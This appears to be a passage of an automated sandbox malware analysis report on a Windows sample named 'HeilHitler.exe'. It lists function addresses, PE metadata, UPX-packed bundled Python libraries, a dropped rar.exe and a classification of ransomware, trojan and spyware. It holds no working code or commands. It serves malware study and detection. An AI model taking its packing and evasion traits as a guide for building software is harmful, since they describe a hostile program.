              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAEE0F801_2_00007FFDFAEE0F80
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAE820B31_2_00007FFDFAE820B3
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAE81BE01_2_00007FFDFAE81BE0
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAE8168B1_2_00007FFDFAE8168B
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAE825721_2_00007FFDFAE82572
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAE81DD41_2_00007FFDFAE81DD4
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAE8195B1_2_00007FFDFAE8195B
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAEE81C01_2_00007FFDFAEE81C0
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFB2932301_2_00007FFDFB293230
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF430C11_2_00007FFDFAF430C1
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFB077AF01_2_00007FFDFB077AF0
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFB0E39D01_2_00007FFDFB0E39D0
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFB0F7A101_2_00007FFDFB0F7A10
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF441651_2_00007FFDFAF44165
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF43FDA1_2_00007FFDFAF43FDA
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF4655A1_2_00007FFDFAF4655A
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF46A821_2_00007FFDFAF46A82
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF44C371_2_00007FFDFAF44C37
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF5BF201_2_00007FFDFAF5BF20
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF5BD601_2_00007FFDFAF5BD60
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF422891_2_00007FFDFAF42289
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF427661_2_00007FFDFAF42766
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFB06FE301_2_00007FFDFB06FE30
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF432E71_2_00007FFDFAF432E7
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF43B931_2_00007FFDFAF43B93
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFB0773101_2_00007FFDFB077310
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF451691_2_00007FFDFAF45169
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF45D851_2_00007FFDFAF45D85
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF4114F1_2_00007FFDFAF4114F
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF6B1C01_2_00007FFDFAF6B1C0
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF5F2001_2_00007FFDFAF5F200
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF5F0601_2_00007FFDFAF5F060
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF429CD1_2_00007FFDFAF429CD
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF46CB71_2_00007FFDFAF46CB7
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF421B71_2_00007FFDFAF421B7
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF4609B1_2_00007FFDFAF4609B
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF46F231_2_00007FFDFAF46F23
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAFAF7001_2_00007FFDFAFAF700
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF422E81_2_00007FFDFAF422E8
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF470451_2_00007FFDFAF47045
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF41EA11_2_00007FFDFAF41EA1
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFB17F4601_2_00007FFDFB17F460
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF6B5501_2_00007FFDFAF6B550
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF45B0F1_2_00007FFDFAF45B0F
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF41B221_2_00007FFDFAF41B22
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFB0E2A901_2_00007FFDFB0E2A90
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF44D041_2_00007FFDFAF44D04
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFB022B401_2_00007FFDFB022B40
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF45D9E1_2_00007FFDFAF45D9E
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF423F11_2_00007FFDFAF423F1
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF46EEC1_2_00007FFDFAF46EEC
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFB07B0201_2_00007FFDFB07B020
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF4213F1_2_00007FFDFAF4213F
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF5EF001_2_00007FFDFAF5EF00
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF472C01_2_00007FFDFAF472C0
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF446331_2_00007FFDFAF44633
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF41A4B1_2_00007FFDFAF41A4B
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF470771_2_00007FFDFAF47077
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF46FFA1_2_00007FFDFAF46FFA
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF436931_2_00007FFDFAF43693
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF434861_2_00007FFDFAF43486
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF41B311_2_00007FFDFAF41B31
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFB0761301_2_00007FFDFB076130
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF45E201_2_00007FFDFAF45E20
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF460D71_2_00007FFDFAF460D7
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFB0726701_2_00007FFDFB072670
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF41CC11_2_00007FFDFAF41CC1
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF44E4E1_2_00007FFDFAF44E4E
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF45A601_2_00007FFDFAF45A60
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF472521_2_00007FFDFAF47252
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF438321_2_00007FFDFAF43832
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF435FD1_2_00007FFDFAF435FD
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF41CFD1_2_00007FFDFAF41CFD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9AC90D737_2_00007FFD9AC90D73
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9AD630277_2_00007FFD9AD63027
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFD9ACB0D2338_2_00007FFD9ACB0D23
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C154C068_2_00007FF702C154C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C1118068_2_00007FF702C11180
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C082F068_2_00007FF702C082F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C0188468_2_00007FF702C01884
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C0B54068_2_00007FF702C0B540
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C0ABA068_2_00007FF702C0ABA0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C37B2468_2_00007FF702C37B24
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C10A2C68_2_00007FF702C10A2C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C2AE1068_2_00007FF702C2AE10
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C2C3E068_2_00007FF702C2C3E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C3037468_2_00007FF702C30374
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C1236068_2_00007FF702C12360
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C5832C68_2_00007FF702C5832C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C0A50468_2_00007FF702C0A504
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C4546868_2_00007FF702C45468
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C2D45868_2_00007FF702C2D458
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C641CC68_2_00007FF702C641CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C481CC68_2_00007FF702C481CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C4216468_2_00007FF702C42164
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C042E068_2_00007FF702C042E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C5131468_2_00007FF702C51314
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C402A468_2_00007FF702C402A4
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C1D2C068_2_00007FF702C1D2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C5226868_2_00007FF702C52268
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C1E21C68_2_00007FF702C1E21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C0F24C68_2_00007FF702C0F24C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C2724468_2_00007FF702C27244
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C267E068_2_00007FF702C267E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C117C868_2_00007FF702C117C8
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C338E868_2_00007FF702C338E8
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C4190C68_2_00007FF702C4190C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C3090468_2_00007FF702C30904
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C518A868_2_00007FF702C518A8
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C1289068_2_00007FF702C12890
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C0888468_2_00007FF702C08884
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C5260C68_2_00007FF702C5260C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C365FC68_2_00007FF702C365FC
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C2F5B068_2_00007FF702C2F5B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C1859868_2_00007FF702C18598
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C3F59C68_2_00007FF702C3F59C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C3A71068_2_00007FF702C3A710
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C4071068_2_00007FF702C40710
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C4270068_2_00007FF702C42700
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C686D468_2_00007FF702C686D4
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C186C468_2_00007FF702C186C4
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C5766068_2_00007FF702C57660
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C59B9868_2_00007FF702C59B98
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C44B3868_2_00007FF702C44B38
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C56D0C68_2_00007FF702C56D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C29D0C68_2_00007FF702C29D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C0DD0468_2_00007FF702C0DD04
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C45C8C68_2_00007FF702C45C8C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C18C3068_2_00007FF702C18C30
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C469FD68_2_00007FF702C469FD
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C049B868_2_00007FF702C049B8
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C2D97C68_2_00007FF702C2D97C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C3D91C68_2_00007FF702C3D91C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C0CB1468_2_00007FF702C0CB14
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C6AAC068_2_00007FF702C6AAC0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C3FA6C68_2_00007FF702C3FA6C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C45A7068_2_00007FF702C45A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C44FE868_2_00007FF702C44FE8
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C6DFD868_2_00007FF702C6DFD8
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C3C00C68_2_00007FF702C3C00C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C6AF9068_2_00007FF702C6AF90
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C35F4C68_2_00007FF702C35F4C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C600F068_2_00007FF702C600F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C2010468_2_00007FF702C20104
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C3007468_2_00007FF702C30074
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C2C05C68_2_00007FF702C2C05C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C1303068_2_00007FF702C13030
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C3804068_2_00007FF702C38040
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C0EE0868_2_00007FF702C0EE08
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C11E0468_2_00007FF702C11E04
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C51DCC68_2_00007FF702C51DCC
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C49D7468_2_00007FF702C49D74
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C30D2068_2_00007FF702C30D20
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C3AF0C68_2_00007FF702C3AF0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C09EFC68_2_00007FF702C09EFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C4EEA468_2_00007FF702C4EEA4
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C18E6868_2_00007FF702C18E68
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C5FE7468_2_00007FF702C5FE74
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C0CE8468_2_00007FF702C0CE84
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C4AE5068_2_00007FF702C4AE50
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: String function: 00007FF702C18444 appears 48 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: String function: 00007FF702C449F4 appears 53 times
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: String function: 00007FFDFAF4483B appears 68 times
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: String function: 00007FFDFAF424B9 appears 51 times
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: String function: 00007FFDFAF44057 appears 437 times
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: String function: 00007FF633D62710 appears 104 times
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: String function: 00007FFDFAF42A04 appears 39 times
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: String function: 00007FF633D62910 appears 34 times
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: String function: 00007FFDFAEEDCDF appears 213 times
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: String function: 00007FFDFAEEDD75 appears 101 times
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: String function: 00007FFDFAF4300D appears 50 times
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: String function: 00007FFDFAE812EE appears 563 times
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: String function: 00007FFDFAF42734 appears 294 times
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: String function: 00007FFDFAF41EF1 appears 730 times
              Source: HeilHitler.exeStatic PE information: invalid certificate
              Source: rar.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: HeilHitler.exeBinary or memory string: OriginalFilename vs HeilHitler.exe
              Source: HeilHitler.exe, 00000000.00000003.1678668051.0000028B9207F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000000.00000003.1678458745.0000028B9207F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000000.00000000.1677023971.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemsra.exej% vs HeilHitler.exe
              Source: HeilHitler.exe, 00000000.00000003.1678252343.0000028B9207F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000000.00000003.1681133155.0000028B9207F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000000.00000003.1679683243.0000028B9207F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs HeilHitler.exe
              Source: HeilHitler.exe, 00000000.00000003.1680725372.0000028B9207F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs HeilHitler.exe
              Source: HeilHitler.exe, 00000000.00000003.1678076504.0000028B9207F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000000.00000003.1677234536.0000028B9207F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs HeilHitler.exe
              Source: HeilHitler.exe, 00000000.00000003.1678337779.0000028B9207F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000000.00000003.1678569630.0000028B9207F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000000.00000003.1680619720.0000028B9207F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000000.00000003.1677368472.0000028B9207F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000000.00000003.1677584002.0000028B9207F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000000.00000003.1678764252.0000028B9207F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs HeilHitler.exe
              Source: HeilHitler.exeBinary or memory string: OriginalFilename vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000002.2038435153.00007FFE11528000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibsslH vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000002.2040367940.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000002.2039278900.00007FFE126FC000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000002.2037694871.00007FFE0EB6D000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000002.2037394805.00007FFDFB8A0000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython310.dll. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000002.2038962389.00007FFE11EE8000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000002.2040120021.00007FFE13323000.00000004.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000002.2038719112.00007FFE11ECE000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000000.1681928618.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemsra.exej% vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000002.2039781620.00007FFE130CC000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000002.2038035078.00007FFE10313000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000002.2039519511.00007FFE12E1C000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000002.2034101253.00007FFDFAE77000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs HeilHitler.exe
              Source: HeilHitler.exe, 00000001.00000002.2036329876.00007FFDFB42E000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs HeilHitler.exe
              Source: HeilHitler.exeBinary or memory string: OriginalFilenamemsra.exej% vs HeilHitler.exe
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: Commandline size = 3647
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: Commandline size = 3647Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: libcrypto-1_1.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9987754672181373
              Source: libssl-1_1.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9903915229885057
              Source: python310.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9989695677157001
              Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9974986001493175
              Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9949597928113553
              Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@139/52@2/2
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C1CAFC GetLastError,FormatMessageW,68_2_00007FF702C1CAFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C4B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,68_2_00007FF702C4B57C
